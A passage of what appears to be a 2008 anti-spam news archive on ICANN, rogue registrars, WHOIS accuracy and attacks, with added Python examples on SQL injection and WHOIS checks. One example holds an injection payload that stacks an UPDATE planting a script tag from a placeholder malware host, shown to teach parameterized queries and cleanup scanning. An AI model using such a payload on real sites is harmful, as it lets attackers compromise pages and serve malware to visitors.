| NIC1, Inc | No Change |
| Oil Change Domains, Inc. | No Change |
| Own Identity, Inc. | No Change |
| Pitchback Domains, Inc. | No Change |
| Pointag Technologies, Inc. | No Change |
| Slaphappy Domains, Inc. | No Change |
| Snowflake Domains, Inc. | No Change |
| Thought Convergence, Inc. | No Change, No country |
| Threadagent.com, Inc. | No Change |
| Total Calories, Inc. dba Slim Names | No Change |
| USA Intra Corp. (New) | No Address, No country |
| united-domains AG | No Change, No country |
| Valley Apples, Inc. | No Change |
| Verelink, Inc. | No Change, No country |
| Walela Brook, Inc. | No Change |
| Website Source, Inc. (New) | No Address, No country |
| Western United Domains, Inc. | No Change |
| WGB Registry, Inc. | No Change |
| White Socks Domains, Inc. | No Change |
July 9, 2008
Computer industry heavyweights are hustling to fix a flaw in the foundation of the Internet that would let hackers control traffic on the World Wide Web.
Major software and hardware makers worked in secret for months to create a software "patch" released on Tuesday to repair the problem, which is in the way computers are routed to web page addresses.
"It's a very fundamental issue with how the entire addressing scheme of the Internet works," Securosis analyst Rich Mogul said in a media conference call.
(breitbart.com)
July 8, 2008
The international organization that oversees the Web's top-level domain naming system said that the hijacking last month of several of its domains was due to a security breach at the registrar that manages those URLs.
Although it did not name the registrar explicitly, according to WHOIS searches, New York-based Register.com manages the domains that were redirected, as well as the primary icann.org and iana.org domains.
Two weeks ago, Turkish hackers rerouted traffic to some of the domains used by ICANN (Internet Corporation for Assigned Names and Numbers) and one of its subsidiary organizations, IANA (Internet Assigned Numbers Authority).
(nytimes.com)
July 7, 2008
Contrary to the current speculation,
KnujOn is not totally tying up ICANN. The truth about what is preventing reports from reaching ICANN is much more sinister.
While ICANN was meeting in Paris, some of their mirror sites were hacked/vandalized. Since public
disclosure of this event was unavoidable, ICANN responded by acknowledging not one, but two attacks:
"In a separate and unrelated incident a few days later, attackers used a very recent exploit in popular blogging software Wordpress to target the ICANN blog. The attack was noticed immediately and the blog taken offline while an analysis was run. That analysis pointed to an automated attack. The blogging software has since been patched and no wider impact (except the disappearance of the blog while the analysis was carried out) was noted."
Aside from these intrusions, ICANN's very compliance interface appears to be under attack, possibly a
denial of service attack, flooding their servers with requests, similar to ones that
targeted CastleCops last year. Obviously this is designed to prevent consumers from submitting complaints. This comes after
ICANN issued enforcement notices against troublesome
registrars. This "front end" assault seems to be paired with a "back end" denial
from certain registrars who are blocking access to their registration records. This combination of
traffic jam and record denial has made ICANN's compliance system more or less inoperable.
Were this situation unexpected it would be forgivable. Unfortunately, at a June 11, 2007 presentation Knujon
warned ICANN about this very event. We expressed serious concern that ICANN's compliance system would be
the target of cyber attacks. Sadly, our warnings were not heeded.
Denial of service attacks have moved beyond threats to specific organizations to
entire countries
like Lithuania and The Marshall Islands.
In order to ensure the stability and security of the Internet, ICANN needs to work more proactively on
these threats.
July 6, 2008
Auto Warranty Insurance renewal scam
"a recorded message to my cell phone with an offer to extend the soon expiring warranty of a car that we currently own."
July 5, 2008
In a unique experiment called Super Spam Me, 50 people from around the world surfed the web unprotected for a month, actively engaging with spammers and heading into the parts of the internet most of us avoid, to find out just how much spam they could attract and what the effect would be.
(timesonline.co.uk)
July 4, 2008
IntelliShield Analysis: Relaxing the rules for domain names and approved
character sets could open up new opportunities for Internet adoption, spur
business opportunities in an already-crowded domain namespace, and
internationalize DNS infrastructure, but there are also many potential
pitfalls. According to a recent report from KnujOn, a site devoted to
reducing unsolicited commercial e-mail, 90 percent of illicit domains
share the same 20 registrars.
(cisco.com)
July 3, 2008
Auto Warranty Insurance renewal scam
"A recorded voice called me on my cell to tell me my vehicle warranty was about to expire"
21 calls reported from this number. According to 4 reports the identity of this caller is Linda Wospil
Telemarketer: Auto Factory Warranty/File Complaint
July 2, 2008
It creates a local copy of itself called c:\windows\msvecurity.exe, which is what gets executed.
(garwarner.blogspot.com)
July 1, 2008
eBay was ordered to pay nearly 40 million euro to a luxury goods company, because it has allowed the sale of counterfeit goods. According to The Press Association, the online auction site has to pay LVMH, which deals with famous brands like Louis Vuitton, Givenchy, Fendi, Dior, Emilio Pucci and Marc Jacobs, £30 million. eBay was accused of not checking the authenticity of the products and allowing the sale of fake Louis Vuitton handbags and Dior perfumes.
(efluxmedia.com)
June 30, 2008
Reporting on a Nevada Corporation, VeriResume, PhishBucket pointed out flaws in their job offers, and criticized how they appeared to do business. PhishBucket editor, Tabatha Marshall provided her research findings, suggesting that job seekers do their homework before giving away their personal information to this suspicious company. “VeriResume appeared to send emails in a manner that had all the hallmarks of a classic phishing scheme,” said Marshall.
...
It turns out that VeriResume is owned by Internet Solutions Corp. (ISC), and Alec Difrawy, who was formerly convicted of and sentenced for fraud. Author Les Henderson recently wrote a book called “Under Investigation,” which discussed Difrawy’s shady criminal past – including similar job agency schemes and allegations of horrific child abuse.
(phishbucket.org)
So once again we see an Internet company that seems to be owned by someone previously convicted of fraud.
Anonymous Domain Sales: A Spammer's Delight
'Spam King' to pay $6 million to MySpace
Scott Richter is a Registrar?!?!
June 29, 2008
An anonymous reader writes "A GoDaddy Vice President has been caught
bidding against customers in their own domain name auctions. The employee
Adam Dicker isn't just any GoDaddy employee; he's head of the GoDaddy
subsidiary that controls the auctions. Dicker won some of the domains he
bid for, and pushed up the bid price on auctions he didn't win. The
conflict of interest is unethical
(tech.slashdot.org)
June 28, 2008
According to new rules unanimously passed by the Internet Corporation for Assigned Names and Numbers, or Icann, at its meeting here, any company, organization or country will soon be able to apply for a new Web address extension, called a top-level domain.
The Icann board also passed another less controversial proposal that would allow these domains to be registered in scripts other than Roman characters, like Chinese, Arabic and Cyrillic. Specific countries could receive the equivalent of their two-letter country code, like Bulgaria's .bg, in their native alphabet.
(nytimes.com)
Some folks think this will result in "no change", but the no change we're concerned with is the lack of attention to security issues by ICANN. It's entirely possible that the release of these unique TLDs will not increase the level of criminality on the Internet, but our issue is that the responsibility over the existing structure has been sidestepped.
When a car company builds a new model they smash it into a wall 100 times to see what happens. I don't see this kind of forethought or testing with the 'Net. The ability of the market to produce new technology will always outpace the security structure's ability to defend against abuses. How long did it take the banks to wake up to phishing? How long did it take for law enforcement to spread digital forensics? How long did it take for networks to protect against viruses? We're talking about years before efficient standard practices became commonplace.
ICANN has fumbled the ball on its two core responsibilities:
- Keep the Whois accurate - We all know it isn't
- Keep criminals from becoming registrars and registrars from becoming criminals - See above and below
The unique TLD program seems like a diversion: rather than addressing realistic concerns about fraud and abuse, they're throwing candy and coins to the crowd like Eva Peron.
June 27, 2008
OnLine Drug Danger - AC360 Daily Podcast: 06/25/2008
(cnn.com)
June 26, 2008
The ICANN and IANA websites were defaced earlier today by a Turkish group called "NetDevilz". ICANN is responsible for the global coordination of the Internet's system of unique identifiers. These include domain names, as well as the addresses used in a variety of Internet protocols. The Internet Assigned Numbers Authority (IANA) is responsible for the global coordination of the DNS Root, IP addressing, and other Internet protocol resources.
Their domains were redirecting to a hosting space at "atspace.com" where the defacers left the following message:
"You think that you control the domains but you don't! Everybody knows wrong. We control the domains including ICANN! Don't you believe us?"
(zone-h.org)
ICANN Asked To Shut Down "Worst" Chinese Registrar
PASSING THE SPAM BUCK - Why one report suggests registrars share the blame
Will ICANN take action against "worst" Chinese registrar?
Anonymous Domain Sales: A Spammer's Delight
70 Registrars are in mystery locations
"Worst Spam Offenders" Notified by ICANN
Most Spam Sites Tied to a Handful of Registrars
90% of the Illicit Sites Tracked by KnujOn Clustered at 20 registrars
June 25, 2008
Citizens of the Marshall Islands in the South Pacific have been left without a functioning email system following a denial of service attack on the country's sole ISP.
It could take days to fully restore service, the general manager of the Marshall Islands National Telecommunications Authority (NTA) told Radio New Zealand International. Systems at the monopoly carrier were taken offline by a flood of email traffic from compromised PCs.
(theregister.co.uk)
June 24, 2008
The report from StopBadware.org also showed a dramatic rise in China's role in the malware epidemic. Six of the 10 networks were internet service providers or backbone providers based in China and hosted more than 41 percent of the malicious websites.
The findings come a few weeks after anti-spam outfit Knujon released a separate report that found that almost 75 percent of spam sites were signed up by just 10 registrars. Once again, the three biggest offenders were located in China and included Xinnet Bei Gong Da Software, BEIJINGNN and Todaynic.
(theregister.co.uk)
June 22, 2008
On the eve of a crucial meeting for ICANN, the chairman of its Governmental Advisory Committee tells us what he expects the Paris meeting's main topics of discussion will be.
(domainesinfo.fr)
The registrar blacklist
June 21, 2008
[KnujOn] also observed registrars, “not following up quickly when certain complaints are issued, not really engaging the consumer…” and “dismissing [their] concerns about fraud on the internet”. However, he does not lay blame on registrars alone. “ICANN shares some of the blame,” he states. “They do have a responsibility/contractual obligation to do certain duties.” And that responsibility reaches farther, in his view, to ISPs, and even companies victimized by online fraud “for not protecting their brands in an aggressive way.” He also strongly feels government agencies, too, should do more—the FBI, the FDA—anybody responsible for overseeing any type of commerce.
(namesmash.com)
June 20, 2008
I verified that the samples (knujon) used to make this point -- fallspot.com, finest-favorite.com, kheenerso.com, mountainfavor.com, rsavefu.com, tioakjiopa.com, exellentquality.com, polaebrue.com, orderheres.com, keesnerrt.com, killsioe.com, hiaoteyy.com, vijeast.com, and tinescoz.com -- were indeed spam storefronts for replica watches and online pill merchants.
All were registered through Xinnet, although in more than half the cases, there was no WHOIS contact information listed. A few others had obvious fake names and contact information, such as Fallspot's "David Fox," whose listed Chinese phone number ended in seven zeroes and had an email address of "test@test.com."
Among the handful of sites that did include real-looking contact information, most email addresses and phone numbers turned out to be bogus...
When asked for comment, the ICANN spokesperson issued the following statement:
"ICANN has received the document from Knujon, and Xin Net, along with other registrars that have a high percentage of unchanged Whois inaccuracy reports filed through the WDPRS, are being investigated by ICANN. Until the investigation is concluded and determinations are made, it would be inappropriate for ICANN to comment on the details of the matter."
(thestandard.com)
June 19, 2008
The recent disclosure of the true ownership of PrivacyProtect.org in SecurityFix has drawn praise, rancor and little spam. The comment section of SecurityFix has been loaded up with gibberish messages like: "ktmjnw xdkjbsfmp vnac imsedkrah cmaon mhpeq lfdcenh" and accusations that the Washington Post is run by the CIA.
Obviously there are some people who would rather we not discuss the anonymous ownership of anonymous registry services used by fake pharmacies.
June 18, 2008
The gist of the latest KnujOn memo to ICANN is that Xin Net has over the last year
- hosted over 18,000 illicit domains, advertised in over 1.7 million unsolicited emails, and
- corrected exactly none of the 11,000 sites reported to ICANN by KnujOn
Even better, many of the illicit sites are fake pharmacies, and they are still active. And better than that, these sites were all registered by a handful of customers.
And, to add insult to injury, Xin Net is still registering 100 new illicit sites a day.
(weblog.infoworld.com)
June 17, 2008
Last Saturday, an arbitrator ordered Scott Richter, the president of online advertising and direct marketing firm Media Breakaway, to pay a stiff penalty to MySpace, including $1.2 million in legal fees.
The settlement is the second major one for Richter, who previously settled with Microsoft in August 2005 for $7 million. He was once considered one of the most prolific spammers, sending out over 100 million messages per day.
(betanews.com)
June 16, 2008
Spammers routinely register their sites under false names, or hijack someone else's identity to do so. But new research shows they're also paying for premium services when registering domain names to ensure a deeper level of anonymity...
Out of the 15,000 spam-advertised domains we examined, nearly half -- 7,142 names -- were registered through a Broomfield, Colo. company called Dynamic Dolphin. As I noted in my previous story, Dynamic Dolphin is the seventh most-popular registrar among spammers who provide patently false information in their public WHOIS records...
Dynamic Dolphin is owned by a company called CPA Empire, which in turn is owned by Media Breakaway LLC. The CEO of Media Breakaway is none other than Scott Richter, the once self-avowed "Spam King" who claims to have quit the business. Anti-spam groups also have recently implicated Media Breakaway in the alleged hijacking of more than 65,000 Internet addresses for use in sending e-mail and hosting commercial Web sites...
Dynamic Dolphin is a reseller of registrar services offered by an Indian company called Direct Information PVT Ltd. - also known as Directi and PublicDomainRegistry.com. Directi was the second most popular registrar among spammers who used privacyprotect.org; it handled the registration for nearly 4,000 of those 15,000+ domains that Knujon flagged...
(blog.washingtonpost.com)
June 14, 2008
SAN FRANCISCO — The onslaught of cellphone calls and e-mail and instant messages is fracturing attention spans and hurting productivity. It is a common complaint. But now the very companies that helped create the flood are trying to mop it up.
(nytimes.com)
June 13, 2008
Senate Commerce Committee members Wednesday stressed the importance of striking the right balance with legislation to help fight secretly installed computer spyware and provide the FTC with the tools the agency needs to prosecute high-tech hackers.
(nextgov.com)
June 12, 2008
A new outbreak of SQL attacks began on the 8th. Not that they ever really go away, but new waves replace the old ones. The attackers are using a much larger number of domains than seen in previous months. Just 11 days into June, and already 54 of these domains have been observed. Many of these are previously suspended domains that registrars have released back to the attackers. The end result, some of the domains involved in the late May and early June attacks are now active again. Thus not only newly compromised sites are foisting the malware, but any sites previously compromised that have not cleaned up their pages (and properly parameterized their SQL queries) will now once again be serving as conveyor belts for password stealing trojans.
(blog.scansafe.com)
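As an added illustration of what "properly parameterized" means in the item above (this is example code written for this archive entry, not from the ScanSafe post or from KnujOn), the Python block below uses the standard sqlite3 module to show a view-counter query that pastes a request value straight into SQL beside the same query with a bound parameter, plus the cleanup check a site hit by an earlier wave needs: finding page bodies that pull a script from a foreign host. The table layout, the payload string and the malware.invalid host are constructed for the example; executescript() is used only to stand in for database drivers that accept stacked statements.

```python
import re
import sqlite3


# Constructed sample schema (not from the page): a tiny CMS with an articles
# table whose bodies are rendered into pages, plus a view-counter table.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        CREATE TABLE views (article_id INTEGER);
        INSERT INTO articles (title, body) VALUES ('Welcome', '<p>Hello</p>');
        INSERT INTO articles (title, body) VALUES ('About', '<p>About us</p>');
        """
    )
    return conn


# Hypothetical request parameter of the shape the mass injection waves used:
# it closes the INSERT, stacks an UPDATE that appends a script tag to every
# article body, and comments out the rest of the original statement. The
# script host is a reserved .invalid name, not a real indicator.
PAYLOAD = (
    "1); UPDATE articles SET body = body || "
    "'<script src=\"http://malware.invalid/x.js\"></script>'; --"
)


def log_view_vulnerable(conn: sqlite3.Connection, article_id: str) -> None:
    """'Before': the request value is pasted into the SQL text, so anything
    it contains is parsed as SQL. executescript() stands in for drivers that
    run stacked statements; sqlite3's execute() would reject the second one."""
    sql = f"INSERT INTO views (article_id) VALUES ({article_id})"
    conn.executescript(sql)


def log_view_safe(conn: sqlite3.Connection, article_id: str) -> None:
    """'After': the value is bound as a parameter, so it is stored as data
    and never parsed as SQL, whatever it contains."""
    conn.execute("INSERT INTO views (article_id) VALUES (?)", (article_id,))
    conn.commit()


# Cleanup check: script tags whose src points at a host other than the
# site's own. The trusted host is a constructed placeholder.
SCRIPT_SRC = re.compile(r"<script[^>]+src=[\"']?https?://([^\"'/>]+)", re.I)


def find_injected_scripts(conn, trusted_hosts=("www.example.invalid",)):
    """Return (article_id, host) for each foreign script tag found in a body."""
    hits = []
    for art_id, body in conn.execute("SELECT id, body FROM articles ORDER BY id"):
        for host in SCRIPT_SRC.findall(body or ""):
            if host.lower() not in trusted_hosts:
                hits.append((art_id, host.lower()))
    return hits


def stored_view_values(conn):
    """What actually landed in the views table (shows the payload stored inertly)."""
    return [row[0] for row in conn.execute("SELECT article_id FROM views")]


if __name__ == "__main__":
    hit = make_db()
    log_view_vulnerable(hit, PAYLOAD)
    print("vulnerable query, tainted bodies:", find_injected_scripts(hit))
    fixed = make_db()
    log_view_safe(fixed, PAYLOAD)
    print("parameterized query, tainted bodies:", find_injected_scripts(fixed))
    print("parameterized query, stored value:", stored_view_values(fixed))
```

With the concatenated query every article body ends up carrying the foreign script tag; with the bound parameter the same input is stored verbatim in the views table and no page is touched. The scan is the part that matters for sites re-infected in a later wave: removing the tag without also fixing the query only buys time until the next pass.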
June 11, 2008
ALBANY — Online forums in which thousands of child-porn images have been posted have been stricken from three Internet providers, including two of the nation's five largest, New York Attorney General Andrew Cuomo said Tuesday.
(courant.com)
June 10, 2008
As part of our ongoing effort to ensure compliance and improve responsibility on the part of Internet stakeholders, KnujOn is posting the results of a recent investigation into the public disclosure of the locations of registrar companies. We have found 70 registrars listed on the Internic registrar directory missing street addresses and/or phone numbers. More serious are the following registrars that do not even have their country of location listed: EvoPlus Ltd., Hecta Media, Inc., Hostgator.com LLC, OnlineNIC, Inc., Thought Convergence, Inc., and Verelink, Inc.
This may merely be an oversight that can be corrected quickly, and I believe it should be. Full disclosure of this data will help transparency and trust. While registrants are required to disclose full contact data, the registrars should be held to the same standard.
This report was sent to ICANN and some of the data has already been corrected. The full list is below.
!!! BB Bulk, Inc. dba My Name Now
# 1 DotMobi Registrar, Inc.
10dencehispahard, S.L.
123 Registration, Inc.
8068 Registrar, Inc
A Mountain Domains, Inc.
A. W. B. Trading, Inc.
About Domain Dot Com Solutions Pvt. Ltd. d/b/a
Above, Inc.
Alibaba (China) Technology Co., Ltd.
Alisoft (Shanghai) Co., Ltd.
Anytime Sites, Inc.
AO Domains, Incorporated
Arctic Names, Inc.
Backslap Domains, Inc.
Best Bulk Register, Inc.
Black Ice Domains, Inc.
Blueweb, Inc.
Bottle Domains, Inc.
CodyCorp.com Inc.
Colorado Names Domains, Inc.
Commerce Island, Inc.
Cool Ocean, Inc.
Crisp Names, Inc.
Directi Internet Solutions Pvt. Ltd. d/b/a PublicDomainRegistry.com
DNGLOBE LLC
Domain Jingles, Inc.
DomainCannon.com LLC
Domerati, Inc.
Dootall, Inc.
Dotregistrar, LLC
Dotted Ventures, Inc.
Dynamic Dolphin, Inc.
ELB Group Inc
Emily Names Domains, Inc.
European NIC Inc.
EvoPlus Ltd.
Experian Services Corp.
FBS Inc.
Freeparking Domain Registrars, Inc.
Get SLD, Inc.
Good Luck Internet Services PVT, LTD.
Hecta Media, Inc.
Hostalia USA, Inc.
Hostgator.com LLC
Interdominios, Inc.
IPNIC, Inc
JJH Investments, LLC
Lazy Dog Domains, Inc
Naming Web, Inc.
NEEN.IT Inc., d/b/a namesprit.com
NetraCorp LLC dba Global Internet
NIC1, Inc
Oil Change Domains, Inc.
OnlineNIC, Inc.
Own Identity, Inc.
Pitchback Domains, Inc.
Pointag Technologies, Inc.
Slaphappy Domains, Inc.
Snowflake Domains, Inc.
Thought Convergence, Inc.
Threadagent.com, Inc.
Total Calories, Inc. dba Slim Names
united-domains AG
Valley Apples, Inc.
Verelink, Inc.
Walela Brook, Inc.
Western United Domains, Inc.
WGB Registry, Inc.
White Socks Domains, Inc.
June 9, 2008
Should they all be trusted at first sight by unsuspecting online users? Yes, unfortunately this is the case with the websites of renowned and respected IT security companies. However, now that they are all vulnerable to cross-site scripting, the possibilities to get phished and infected with malware and crimeware are dramatically increased.
(xssed.com)
June 6, 2008
Who Will Rule The New Internet? (time.com)
While Josh Quittner asks a critical question in this Time article, he focuses too much on the technology and completely misses the various political power struggles going on in the background that are pulling and pushing on the Internet. The issues of crime, safety, privacy, espionage and control are going to boil up on the Internet in ways that Time has not considered. In the end it may be the lawyers who control the Internet and not programmers.
June 5, 2008
LegitScript Internet pharmacy verification standards have been recognized by the National Association of Boards of Pharmacy (NABP).
LegitScript’s mission is to assist consumers and businesses in determining which Internet pharmacy websites operate safely and in compliance with Federal and state laws and regulations, as well as with accepted medical standards and ethics.
Over the next several months, LegitScript.com will be adding functionality to our website that will give consumers the ability to compare prices for specific prescription drugs from LegitScript-approved Internet pharmacies.
(legitscript.com)
June 4, 2008
SAN JOSE, Calif. -- When surfing the Internet for safe Web sites, not all domains are equal. Companies that assign addresses for Web sites appear to be cutting corners on security more when they assign names in certain domains than in others, according to a report to be released Wednesday by antivirus software vendor McAfee Inc.
McAfee found the most dangerous domains to navigate to are ".hk" (Hong Kong), ".cn" (China) and ".info" (information).
(washingtonpost.com)
June 3, 2008
ENISA (the European Network and Information Security Agency) presented a report estimating that spam cost Europe €27 billion in 2007, and represents a growing threat with the danger of a 'digital 9/11' on the horizon. The group called on the EU to improve efforts to combat the spam menace, including greater funding for anti-spam initiatives, a more unified approach to tackling spam, and the implementation of mandatory intrusion reporting systems.
Meanwhile the Internet Corporation for Assigned Names and Numbers (ICANN), the body responsible for maintaining the structure of the internet, had also been raising their efforts to reduce spam. Following the publication of a report suggesting that the vast majority of spamvertised sites are hosted at domains administered by a small number of registrars, the ICANN group responded by contacting the named bodies and threatening to revoke their license to register domain names should they fail to take action to clean up their areas of the web. ICANN has a long-running system for registering complaints against specific domains, and claims to chase up over 75 issues per month with similar enforcement notices. ICANN's announcement, and the KnujOn organisation, who first drew attention to the clustering.
(virusbtn.com)
June 1, 2008
To track and investigate suspicious employment-related email offers.
To work with law enforcement to stop confirmed scams.
To provide help and resources to victims of employment scams.
To make the Internet a safer place.
(phishbucket.org)
May 30, 2008
ICANN sent a notice of breach to ICANN-accredited registrar Red Register, Inc. based on Red Register, Inc.'s failure to comply with the Uniform Domain Name Dispute Resolution Policy ("UDRP"). Specifically, Red Register failed to comply with UDRP Rule 16(a) and paragraph 4(k) of the UDRP despite repeated requests by ICANN and the National Arbitration Forum (“NAF”). These rules require registrars to communicate plans to implement UDRP Provider decisions and implement those decisions.
Consistent with the breach provisions of the Registrar Accreditation Agreement ("RAA"), ICANN requested that Red Register, Inc. act within 15 days to cure the cited breaches. If Red Register, Inc. fails to cure the breaches cited in ICANN’s notice of breach, ICANN will pursue all remedies available under the terms of the RAA, including termination.
The ICANN Board adopted the UDRP and UDRP Rules on 26 August 1999. In addition, ICANN approved the form of implementation documents on 24 October 1999. The RAA requires all accredited registrars to comply with board adopted Consensus policies.
As part of ICANN’s ongoing work to develop and maintain a tough, but fair, contractual compliance program designed to create an even playing field for registrars and registries, ICANN:
- Conducts registrar and registry audits to assess compliance with contractual terms;
- Conducts registrar and registry investigations after receiving information indicating that contract violations have occurred;
- Publishes a monthly newsletter to provide information regarding contractual compliance program activities at http://icann.org/compliance/newsletter/index.htm; and
- Assists thousands of consumers in resolving domain name-related complaints annually.
For more information about the Contractual Compliance Program mission and other details, please visit http://www.icann.org/compliance.
(icann.org)
Notice to Red Register, Inc.
May 29, 2008
WASHINGTON, May 29 (UPI) -- The non-profit association that oversees Internet addresses is trying to crack down on shady Web pages used by spammers and hackers...
"It's a huge problem," said Burnette, declining to give more detailed figures on the numbers of registrants reported to have submitted inaccurate or incomplete information.
"If we find that registrars are not investigating reports (of inaccurate or non-existent WHOIS data) as they are required to, our escalation procedure can ultimately result in their accreditation being terminated," effectively shutting them down, she said.
(upi.com)
ICANN looks to lend a hand in spam fight (betanews.com)
May 28, 2008
In early May Representative Edward J. Markey (D-MA), chairman of the House Subcommittee on Telecommunications and the Internet, joined Reps. John D. Dingell (D-MI), chairman of the Energy and Commerce Committee, and 14 other members of the committee in sending a letter to Department of Commerce Secretary Carlos M. Gutierrez regarding possible changes to ICANN.
The letter was written over their concerns for a major change in the Department of Commerce's (DOC) relationship with ICANN.
(technewsreview.com.au)
ICANN slaps registrars who help criminals (avertlabs.com)
ICANN takes action against spam havens (gcn.com)
ICANN Puts eNom and Moniker “On Notice” (domainnamewire.com)
Top ten worst spam registrars notified by ICANN (blogs.zdnet.com)
May 27, 2008
In an effort to continue highlighting concerns at specific providers we will focus on each company listed in KnujOn's top 10 of the worst spam-related registrars. ICANN responded Friday to this list, which included Xin Net as #1.
Xin Net has been the focus of controversy and efforts at CastleCops recently and is heavily connected to Fast Flux operations, as evidenced by this analysis at the Università degli Studi di Milano. Xin Net accounts for 75% of the Fast Flux traffic. The University of Milan Dipartimento di Informatica e Comunicazione has found 10,570 malicious domains at Xin Net connected to Fast Flux. KnujOn's Xin Net illicit domain count is fast approaching 30,000. Much of this traffic and spam advertises "Canadian Pharmacy" type sites as seen below:
May 26, 2008
Mexico's northern border town of Juarez, infamous for its history of drug-related violence, has gone into lockdown after an e-mail began circulating warning of an unparalleled "bloodbath" in the coming days.
Shops, bars and restaurants have shut and soldiers are patrolling the streets, giving a surreal and dangerous tone to this city of 1.4 million people which sits just across the US border from the Texan town of El Paso.
Authorities are taking seriously the anonymous e-mail, which menaced "the bloodiest and most violent weekend in the history of Juarez."
The place is already reeling from a surge in murders that has claimed around 400 lives so far this year, several of them police officers and members of rival narcotics gangs.
The US embassy to Mexico has told US citizens that the message represented a "potential threat" and that public places, nightspots and the main streets in Juarez should all be avoided.
(breitbart.com)
May 25, 2008
BAGHDAD - He is everywhere but nowhere, an unseen geek whose skills as a software pirate are so impressive that others are now pirating his work.
Posters and pamphlets promoting his latest DVD, Anas08, hang in shop windows and flap in the breeze on vendors' tables wherever computer equipment is sold in Baghdad.
Looking for a new version of Adobe Photoshop, Microsoft Office, or an online edition of the Koran, complete with English translation and an index to topics and verses? They're all on the Anas08 disc, available for about $3, compared with the thousands of dollars it would cost to buy the 390 programs individually through authorized dealers.
This story reminded me of something. Like many folks I know people serving overseas and send them care packages. I asked one serving in Iraq: "Do you want any DVD movies?" to which he responded: "No, we've got them all, they sell them on the street for pennies and before they are even out in the U.S." Shocked but not surprised I asked him what else do they sell? Everything. Office, Server2007, Dreamweaver. Pirated media and software are bountiful everywhere but it gave me pause to think about soldiers loading them onto their laptops or watching movies on them in a war zone. What else is on those disks?
May 24, 2008
The Homeland Security Department’s Science and Technology Directorate has awarded a contract to Secure64 Software to increase the security of the Internet’s Domain Name Servers (DNS).
DNS is one of the most critical back-end processes on the Internet or any other IP network, but it operates somewhat transparently. DNS alleviates the burden of memorizing a Web site’s IP address, instead allowing the user to type in a simple domain name such as www.dhs.gov. The Internet would not be functional from a practical perspective without DNS.
But despite its importance, most DNS implementations are not secured, leaving DNS transactions vulnerable to attacks such as pharming, cache poisoning and DNS redirection.
(usdoj.gov)
May 23, 2008
In order to clarify the system for dealing with incorrect “Whois” domain name registration information, and deal with community concern, ICANN is releasing the following information regarding its compliance work.
MARINA DEL REY, Calif.: ICANN has sent enforcement notices and notices of concern to certain registrars, including those reported this week as being the registrars for the majority of websites advertised in spam emails.
Earlier this week, an investigation by KnujOn, widely reported online, publicly identified 10 registrars as being the companies used to register the majority of domain names that have since appeared in spam email messages.
More than half of those registrars named had already been contacted by ICANN prior to publication of KnujOn’s report, and the remainder have since been notified following an analysis of other sources of data, including ICANN’s internal database.
With tens of millions of domain names in existence, and tens of thousands changing hands each day, ICANN relies upon the wider Internet community to report and review what it believes to be inaccurate registration data for individual domains. To this end, a dedicated online system called the Whois Data Problem Report System (“WDPRS”) was developed in 2002 to receive and track such complaints.*
"ICANN sends, on average, over 75 enforcement notices per month following complaints from the community. We also conduct compliance audits to determine whether accredited registrars and registries are adhering to their contractual obligations," explained Stacy Burnette, Director of Compliance at ICANN.** "Infringing domain names are locked and websites removed every week through this system."
Although the majority of registrars offer excellent services and contribute to the highly competitive market for domains, ICANN’s compliance department has developed an escalation process to protect registrants and give registrars an opportunity to cure cited violations before ICANN commences the breach process.
However, while registrars are responsible for investigating claims of Whois inaccuracy, it is not fair to assume a registrar that sponsors spam-generating domain names is affiliated with the spam activity. A distinction must be made between registrars and an end user who chooses to use a particular domain name for illegitimate purposes.
"But if those registrars, including those publicly cited, do not investigate and correct alleged inaccuracies reported to ICANN, our escalation procedure can ultimately result in ICANN terminating their accreditation and preventing them from registering domain names," Ms Burnette said.
(icann.org)
May 22, 2008
BUCHAREST, ROMANIA – Thirty-eight individuals with ties to international organized crime have been charged in two separate indictments involving computer and credit card fraud schemes, Deputy Attorney General Mark R. Filip, Romanian Prosecutor General Laura Codruța Kövesi, U.S. Attorney for the Central District of California Thomas P. O’Brien and Acting U.S. Attorney for the District of Connecticut Nora R. Dannehy announced today. The Deputy Attorney General made the announcement with the Romanian Prosecutor General to highlight the extensive and continued cooperation between the two countries in addressing these types of international crimes. The announcement comes less than one month after U.S. Attorney General Michael B. Mukasey announced the Department’s new Law Enforcement Strategy to Combat International Organized Crime.
(usdoj.gov)
May 21, 2008
BY COL. CHARLES W. WILLIAMSON III:
The world has abandoned a fortress mentality in the real world, and we need to move beyond it in cyberspace. America needs a network that can project power by building an af.mil robot network (botnet) that can direct such massive amounts of traffic to target computers that they can no longer communicate and become no more useful to our adversaries than hunks of metal and plastic. America needs the ability to carpet bomb in cyberspace to create the deterrent we lack.
(afji.com)
May 20, 2008
Knowing that a minority of companies control most of the sites advertised in spam helps put the junk email problem into better perspective. To illustrate this, consider a typical spam campaign. The emails are generated by tens of thousands of malware-compromised machines and networks on the Internet. They send millions of spam messages to millions of victims. Sounds like a big problem, right? Not exactly. Because the number of actual websites advertised in those millions of messages is rather small in comparison, the effective size of a spam campaign is seriously reduced. Reducing the true size even further is the fact that these real websites are held by one or maybe two registrar companies per campaign. Imagine that a spam campaign is a balloon. A balloon is actually made of a very small amount of real material; it only appears bigger because it's full of hot air. The huge volume of sent spam messages is the hot air that pushes against the boundaries of the Internet's resources, making the problem look bigger than it is. However, the air only stays in the balloon because it is knotted at the bottom. The registrars are this knot.

Discuss the Spam Balloon
Spam domains use small number of registrars (heise-online.co.uk)
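As an added example (written for this archive entry; it is not KnujOn's own tooling or method) of the kind of WHOIS spot checks described in the June 20 item above, and of the registrar clustering the spam balloon argument rests on, the Python block below parses constructed WHOIS records in the usual "Field: value" layout, flags missing, placeholder or implausible contact data, and counts flagged domains per sponsoring registrar. The domains, registrar names and contact values are all constructed (reserved .invalid names, made-up registrars), and the placeholder word lists are assumptions chosen for the example.

```python
import re
from collections import Counter

# Constructed WHOIS records (not real registrations): reserved .invalid
# domains, made-up registrars, and contact data shaped like the cases a
# manual spot check turns up (missing fields, test@ addresses, phone
# numbers padded with zeroes).
SAMPLE_RECORDS = {
    "fake-shop.invalid": (
        "Domain Name: FAKE-SHOP.INVALID\n"
        "Registrar: Example Registrar Ltd\n"
        "Registrant Name: David Fox\n"
        "Registrant Email: test@test.com\n"
        "Registrant Phone: +86.1380000000\n"
    ),
    "empty-contact.invalid": (
        "Domain Name: EMPTY-CONTACT.INVALID\n"
        "Registrar: Example Registrar Ltd\n"
    ),
    "real-looking.invalid": (
        "Domain Name: REAL-LOOKING.INVALID\n"
        "Registrar: Other Registrar Inc\n"
        "Registrant Name: Jane Doe\n"
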